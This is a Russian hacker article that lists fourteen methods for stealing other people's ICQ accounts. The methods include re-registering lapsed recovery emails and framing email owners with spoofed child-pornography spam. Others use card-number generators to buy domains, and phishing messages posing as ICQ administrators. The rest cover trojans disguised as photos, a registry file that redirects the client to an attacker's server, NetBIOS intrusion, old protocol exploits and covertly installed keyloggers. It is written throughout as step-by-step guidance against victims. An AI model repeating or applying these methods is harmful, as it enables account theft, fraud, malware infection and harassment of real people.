14 способов угнать ICQ
Способ #1Номера
первого миллиона регистрировались около 5 лет назад. Поэтому, если
пользователь не менял настроек и информации с первой регистрации, то у
вас есть шанс обнаружить, что его email-адрес (если он был
зарегистрирован на халявном сервере типа yahoo или же hotmail)
аннулирован по бездействию. Тогда Вам требуется просто зарегистрить
такой же адрес, пойти на http://www.icq.com/password, ввести номер
жертвы - и пароль придёт к вам в свежесделанный почтовый ящик.
Запустите ICQ.Выберите меню Add/Find users. Теперь выберите Main
search/Search by ICQ number (UIN). Введите номер, который вы хотите
получить (чем старее номер, тем больше шансов на удачу). Жмите Info.
Теперь смотрите на e-mail этого человека. Он должен быть взят на
халявном сервере.Если он взят не на халявных серверах - жмите BACK и
начните с начала.Теперь - вам нужно пойти на этот сервер и проверить
существование данного e-mail'а. Если он еще существует - то идите к
началу. Если же его нет - то вы почти победили. Зарегистрируйте e-mail
этого человека (полностью идеентичный). И последнее - идите в раздел
для забывчевых, вводите этот UIN и ваш "новый" e-mail. В ближайшее
время вам вышлют пароль!
Способ #2 Существует
другой, более сложный варинт лишeния пользователя его e-mail. Есть
конкретные правила поведения пользователей сервиса (например: e-mail -
нельзя спамить, web - нельзя открыто размещать детское порно), нарушая
которые пользователи, как правило, лишаются права на адрес или
веб-страницу. Кто мешает вам написать несколько десятков тысяч
воззваний к легализации детской порнографии и проституции от имени
duke@something.com? Установите тип сервера, узнайте язык общения с ним
клиента, и пошлите все эти возвания самому себе и своим друзьям (или на
другие емейл аккаунты), указав обратным адресом duke@something.com.
Далее вы и ваши друзья должны будете переправить все "полученное" от
Duke по адресу администратора домена с нотой протеста против
легализации и с просьбой наказать виновного. "Послания" Duke следует
уничтожить, и в завязавшейся переписке с администрацией сообщить, что
следов преступения осталось мало: вы все стерли, так как были
шокированны, и праведный гнев обуял вас так сильно, что всем подьездом
вас держали. Попросите администратора обязательно держать вас в курсе
дела. Далее пошлите сообщение того же самого содержания (используя
обратный адрес Duke) другим вашим друзьям или на другие почтовые
аккаунты, и напишите администрации о этом безобразии в других словах.
Создайте видимость, что этот Duke шлет тысячами сообщения о нелегальных
вещах группе незнакомых между собой людей... Прогнозирую до 80% успеха,
у Duke отнимут аккаунт, о чем вам заявят как о большом достижении в
борьбе со спамерами и рассадниками порнографии. Вы в тот же день
зарегистрируете аккаунт на себя и заявите о потере пассворда. В итоге у
вас - долгожданный UIN и твердая уверенность в том, что если вы имеете
бесплатный емейл - никто никогда у вас его не отнимет.
Будте
внимательны, каждое электронное сообщение содержит заголовок (header),
представляющий из себя служебную информацию о дате отправления
сообщения, названии почтовой программы, IP адресе машины, с которой
было отправлено сообщение, и т.д. Поэтому исполюзуйте для этих целей
специальные программы для спама, которые способны скрыть эту
информацию. Вот некоторые из них: SendIt, EzyMassMailer, CTMailer,
MailThemPro и запускайте их через прокси сервер. У большенства спамеров
отсутствует в настройках возможность работать через прокси, но это
легко поправить с помощью программы SocksCap (программа, позволяющия
запускать через сокет любое приложение, о нем не знающее), для коннекта
используется проски SOCKS-4 или SOCKS-5 port:1080. Из-под SocksCap вы
можете запускать сканеры портов и практически любые программы, скрывая
свой реальный IP. Это очень актуально сегодня, т.к многие провайдеры за
эти "маленькие шалости" лишают пользователей доступа в сеть (
Способ #3 Этот
способ требует значительных усилий и основан на том, что многие люди
используют в качестве пароля какое-нибудь легковычисляемое слово,
например свой ник или имя. Запустите ICQ. Выберите меню Add/Find users.
Теперь выберите Main search/Search by ICQ number (UIN). Введите номер,
который вы хотите получить. Жмите Info. Запомните Uin, ник, настояшее
имя пользователя и другие детали. Нажмите на значок ICQ и выберите
Add/Change Current User. Жмите Add another registered user, Next, Next.
Теперь вводите UIN, а в качестве пароля - ник, имя или какую-то другую
относящуюся к данному пользователю информацию. Вполне возможно, что вам
повезёт. Вообще говоря, существует также целый ряд паролей, особенно
"любимых" малоопытными пользователями, например "Password", "qwerty",
"12345" и т.д. Хотя подбор паролей - это тема отдельной статьи, и мы не
будем здесь подробно на этом останавливаться.
Способ #4 Этот
метод основан на том, что многие пользователи любят указывать почтовый
ящик на несуществующих серверах. Примером могут служить ящики
aaaaa@bbbbb.com. Для получения пароля этой аси вам достаточно,
используя любую генерилку кредитных карточек, купить домен
www.bbbbb.com и, когда он будет задействован, получить письмо с
паролем. Единственное условие: к процессу регистрации домена нужно
подходить с умом. Не везде вам позволят купить домен по несуществующей
кредитке. Для этого я порекомендовал бы www.awc.net. Зарегистрированный
там домен гарантированно просуществует пару недель - достаточный срок
для получения письма.
Способ #5 Если
почтовый ящик пользователя существует, и отобрать его никак не
получается, можно попробовать его попросту взломать. Конечно, если этот
ящик находится у провайдера пользователя, то сделать это будет не так
уж и просто. Но если он находится на одном из бесплатных mail-серверов,
внимательно следите за сообщениями о новообнаруженных "дырах": если вам
повезёт, вы узнаете способ доступа к интересующему вас почтовому ящику
раньше, чем эта "дыра" будет закрыта. А дальше всё просто: вам
достаточно забрать из ящика письмо с паролем раньше, чем его заметит
владелец ящика. А в качестве примера подобного взлома прочтите эту
статью.
Способ #6 Если
почтовый ящик защищён хорошо, и взломать его нельзя, можно попробовать
получить его пароль. Дело в том, что людям свойственно забывать многие
полезные вещи, в том числе и пароли. Поэтому у любой службы бесплатных
почтовых ящиков есть некий механизм, с помощью которого можно
восстановить "забытый" пароль. При этом вам придётся подтвердить, что
вы и есть хозяин того самого ящика. Как правило, для этого необходимо
знать краткую информацию о пользователе, такую как имя, фамилия, дата
рождения, адрес и т.д. Кроме того, почтовые службы практикуют следующий
механизм: при регистрации пользователю предлагается сформулировать
некий вопрос личного плана и дать на него ответ. Если потом
пользователь заявит об утере пароля, ему будет задан этот вопрос, и
если ответ совпадёт, это будет считаться подтверждением личности
пользователя. Так вот, 90% пользователей используют вопросы типа "Как
зовут мою собаку?", "Какая марка моего автомобиля?" и т.п., причём уже
через год после регистрации они гарантированно не помнят, какой именно
вопрос ими был указан. Поэтому, достаточно получасового общения по
аське, чтобы как бы случайно сказать что-то вроде "Я очень люблю свою
собаку! Она породы волкодав, кличка Дружок. А у тебя есть собака? А
какой породы? А как её зовут?". Если правильно выбрать время и задать
вопрос как бы между делом, пользователь наверняка ответит на него,
ничего не заподозрив. Точно таким же образом можно узнать и всю
остальную информацию, необходимую для получения "забытого" пароля,
если, конечно, она не указана в пользовательских деталях ICQ. Если
системы автоматического восстановления забытого пароля в данной
почтовой службе нет, вам придётся написать слёзное письмо постмастеру,
где необходимо будет указать всё те же данные о пользователе. Почтовые
мастера - они люди добрые, они вам помогут.
Способ #7 Послание
якобы от системного администратора (icq_admin@icq.com). Пользователь
Алекс UIN 100001, занимается своими обычными делами в режиме онлайн. Он
проверяет свой почтовый ящик и обнаруживает там письмо от системного
администратора. В письме говорится о том, что ввиду наличия прорех в
компьютерной безопасности, пароли пользователей будут теперь изменены:
“Ваш новый пароль D4YIL”, — написано в полученном Алексом послании. Вы
можете изменить его сами, прямо сейчас, чтобы не терять время и не
подвергать себя опасности, или он вступит в силу через 30 минут после
получения вами этого уведомления. He забудьте его! Не раскрывайте его
никому! Компьютерная безопасность — очень важный аспект, которым нельзя
пренебрегать! Затем вы жмете на ICQ "Add another registered user",
вводите выбранный UIN и посланый вами пароль. Если Алекс поверил, то вы
получите долгожданный UIN. Возможны и другие разновидности этого
способа: например, можно написать подобное письмо, но с требованием
установить в качестве Primary E-mail какой-либо адрес, выгядящий
достаточно убедительно, но зарегистрированный на вас. Либо можно
предложить пользователю внести в список серверов ICQ ip-адрес вашего
сервера, мотивируя это перегруженностью сервера icq.mirabilis.com.
Можно использовать и другие подходы к пользователю - здесь всё
ограничено только вашей фантазией. "На ура" проходят также и письма "от
постмастера" почтовой службы, которую использует жертва. Например, если
почтовый ящик пользователя расположен у его провайдера, и он использует
POP3-доступ, подойдёт письмо об изменении ip-адреса почтового сервера.
Если жертва внесёт указанные вами изменения в настройки своей почтовой
программы, то он сам выложит вам свой пароль, связавшись с любезно
предоставленным вами подставным POP3-сервером.
Способ #8 Этот
путь наиболее широко распространён. Берётся какой-либо свежий почтовый
троянец - например, последняя версия Naebi Soseda, Stealth, Shtirliz,
Hooker, GIP (работают под 95/98/NT). Используя Microangelo98 , у него
меняется иконка на иконку от графического файла (или любую другую на
ваше усмотрение), и сервер трояна после всех манипуляций
переименовывается во что-то вроде "photo.jpg (куча пробелов) .exe". При
передаче файла через ICQ будет видно только начало имени, и жертва так
ничего и не заподозрит, пока не нажмёт на "open". Но тогда будет уже
поздно. Обычно файл передаётся под видом фотографии после короткой
беседы с жертвой. См. также FAQ по троянам на нашем сайте.
Способ #9 Если
вы имеете представление о протоколах, по которым ICQ-клиент
регистрируется на сервере при каждом подключении к сети, вы можете
взять пароль непосредственно из перехваченного сетевого траффика. Для
такого перехвата могут быть использованы различные способы. Если
ваделец UINа находится в вашей локальной сети, вы можете применить
сниффер . Если нет, попробуйте сделать так, чтобы он запустил на своём
компьютере .reg-файл, содержащий (помимо полезных действий, например
оптимизации файловой системы Windows) строки:
[HKEY_CURRENT_USERSoftwareMirabilisICQDefaultPrefs] "Default Server
Host"="Имя или ip-адрес вашего сервера" На этом сервере вам необходимо
будет выделить из траффика всю нужную вам информацию, а затем
перенаправить его на icq.mirabilis.com. То же самое можно сделать,
используюя "фальшивый" прокси-сервер. Кстати, на многих хакерских
сайтах сейчас можно найти списки анонимных прокси-серверов. Многие
пользователи, желая скрыть свой ip, пользуются их услугами, не
подозревая, что часть этих серверов принадлежит весьма любопытным
владельцам, а то и спецслужбам некоторых стран. Причина интереса
спецслужб проста: раз уж человек желает анонимности, значит ему есть
что скрывать. И не надо устанавливать дорогостоющую аппаратуру у всех
Интернет-провайдеров, как это пытаются сейчас сделать в России.
Достаточно контролировать несколько десятков "анонимных" прокси - и
"клиент" сам себя выдаст! Причём вычислить такое "прослушивание"
абсолютно невозможно - ведь прокси выглядит абсолютно надёжным и
анонимным. В принципе, он и является анонимным. Почти для всех. Кроме
владельца. Не того, кто указан в базе данных WhoIs, а НАСТОЯЩЕГО
владельца.
Способ #10 Удаленный
доступ к компьютеру. Данный метод подразумевает некоторые навыки
общения с программами и методами, предоставляющими возможности
удаленного доступа к компьютеру, на котором установлена аська с
интересующим вас номером. Обычно для этих целей используется троянские
кони Back Orifice, NetBus, Sub7 и др. Но они получили слишком широкое
распространение и теперь обнаружиавются антивирусами. Так что ищите
менее распространенный. Кроме того, возможно удалённое подключение к
компьютеру жертвы через 139-й порт по протоколу NetBIOS. Очень часто
ресурсы, доступные через этот порт, вообще не имеют пароля, а если этот
пароль и присутствует, подбирать его намного быстрее и удобнее, чем,
например, регистрационный пароль ICQ. Для этого существует огромное
количество специализированных программ, наиболее популярная - Legion .
Вам нужно всего лишь получить системные файлы аськи. А именно:
"номер_аси.dat и номер_аси.idx" из каталога "crogram filesicqdb". Это
если ася проинсталлирована в каталог по умолчанию. Остальные файлы для
этого UIN-на вы сможете сфабриковать из аналогичных файлов любого
другого номера. После этого, корректно изменив информацию в системном
реестре, вы сможете сконнектиться под данным номером.
Способ #11 Можно
ли изменить пассворд чужого ICQ аккаунта без получения доступа к
компьютеру его владельца? Когда-то, во времена icq98, это было
возможно. Существовала программа для взлома ICQ под названием
"ICQhijeck" (или "ICQhijeek"). При наличии IP жертвы, его UINa и номера
порта для связи с клиентом, ICQhijeck посылал spoofed пакет, заявляющий
о себе, что пакет принадлежит самому клиенту и несет в себе задачу
смены пассворда. Пассворд выбирал нападающий. В конце концов Mirabilis
убрал этот баг, но вдруг вам повезёт, и вы найдёте юзера, который не
обновлял своего ICQ-клиента в течение последних двух лет.. .
Способ #12 Ещё
одна старая уязвимость состояла в том, что при активированном ICQ
homepage, был возможен доступ к локальным файлам, используя обратный
путь к директориям. Начиная с 99-х версий, ICQ предоставляет
пользователям новую, достаточно удобную и простую в реализации
возможность - создать небольшой персональный веб-сервер. При этом, от
пользователя требуется минимум усилий - достаточно выбрать в меню
Services -> My ICQ Page -> Activate Homepage. При этом
открывается доступ к виртуальному серверу, который по умолчанию
расположен на 80 порту компьютера пользователя. Причём этот сервер, без
всякой настройки, способен выполнить большинство функций, необходимых
типичной домашней страничке. И все бы было хорошо, если бы ни одно: в
ранних версиях icq был возможен доступ к любому файлу на компьютере
пользователя, используя адреса вида:
http://текущий.ip.адрес.пользователя....../config.sys. Вообще говоря,
обратный путь - одна из самых типичных ошибок http-серверов.
Практически все известные веб-сервера имели тот или иной вариант этой
ошибки в своих ранних версиях, и ICQ не стало исключением. Лишь начиная
с версии 3.19 эта дыра была закрыта, и всесто доступа к файлам
пользователя, обращение к подобным адресам стало приводить к
стандартной ошибке 403 Forbidden. Тем не менее, пользователей со
старыми версиями ICQ всё ещё можно встретить в сети.
Способ #13 Если
у вас есть прямой доступ к компьютеру, на котором стоит интересующая
вас ася (или находится любая другая нужная вам информация), просто
принести на дискете и установите клавиатурного шпиона, например SAM
007, когда жертва не будет видеть. Вы сможете узнать что, где и когда
набиралось на клавиатуре. У вас в руках будет вся интересующая вас
информация.
Способ #14 В
конце концов, ICQ UIN можно просто купить. При этом ваша совесть будет
почти чиста - вы можете искренне убеждать себя, что купленный вами
номер с самого начала принадлежал продавцу и не является краденым.
Правда, в этом случае вы должны всегда быть готовы к тому, что в один
прекрасный день объявится законный владелец вашего "нового" UINa, и
деньги заплаченные за него, окажутся выброшенными на ветер. Да и никто
не даст вам гарантию, что после успешно завершённой сделки, UIN не
будет украден повторно, на этот раз уже у вас.
Взято с xaker.name
